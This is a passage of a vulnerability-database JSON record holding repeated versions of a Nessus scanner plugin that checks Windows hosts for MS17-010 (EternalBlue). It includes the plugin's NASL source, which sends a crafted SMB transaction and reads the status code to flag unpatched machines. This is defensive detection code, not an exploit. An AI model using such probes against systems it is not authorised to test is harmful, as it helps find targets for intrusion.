transname:\"\\PIPE\\\");\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n security_report_v4(port: port, severity: SECURITY_HOLE);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2018-11-17T03:13:38", "differentElements": ["cvelist", "cvss", "description", "href", "modified", "references", "reporter", "sourceData"], "edition": 2}, {"bulletin": {"id": "MS17-010.NASL", "hash": "49780494f150c8bc0aa084e3c459ba8cddaa12be6217a734a5c458ecb9db59d0", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2019-12-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?8dcab5e4", "http://www.nessus.org/u?4c7e0cf3", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "http://www.nessus.org/u?234f8ef8", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?68fc8eff", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?b9d9ebf9", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2019-12-13T08:09:43", "history": [], "viewCount": 6516, "enchantments": {"dependencies": {"modified": "2019-12-13T08:09:43", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["SSV:92952", "SSV:92935", "SSV:92964"], "type": "seebug"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED", "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644"], "type": "fireeye"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MYHACK58:62201785243", "MYHACK58:62201785189", "MYHACK58:62201785331", "MYHACK58:62201785268", "MYHACK58:62201786816", "MYHACK58:62201786827"], "type": "myhack58"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-12-13T08:09:43", "value": 7.5, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n ret = smb_sendrecv (data:packet);\n if (!ret)\n return NULL;\n\n return smb_get_error_code (data:ret);\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\nstatus = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n security_report_v4(port: port, severity: SECURITY_HOLE);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2019-12-13T08:09:43", "differentElements": ["cvss3", "modified"], "edition": 3}, {"bulletin": {"id": "MS17-010.NASL", "hash": "2e89364697b0c22cabb8b6af54ef1391c6c3ec60dfbd44186417c803cc34c48f", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2020-03-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?8dcab5e4", "http://www.nessus.org/u?4c7e0cf3", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "http://www.nessus.org/u?234f8ef8", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?68fc8eff", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?b9d9ebf9", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2020-03-18T01:26:56", "history": [], "viewCount": 6643, "enchantments": {"dependencies": {"modified": "2020-03-18T01:26:56", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["SSV:92952", "SSV:92935", "SSV:92964"], "type": "seebug"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED", "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644"], "type": "fireeye"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MYHACK58:62201785243", "MYHACK58:62201785189", "MYHACK58:62201785331", "MYHACK58:62201785268", "MYHACK58:62201786816", "MYHACK58:62201786827"], "type": "myhack58"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2020-03-18T01:26:56", "value": 7.5, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", 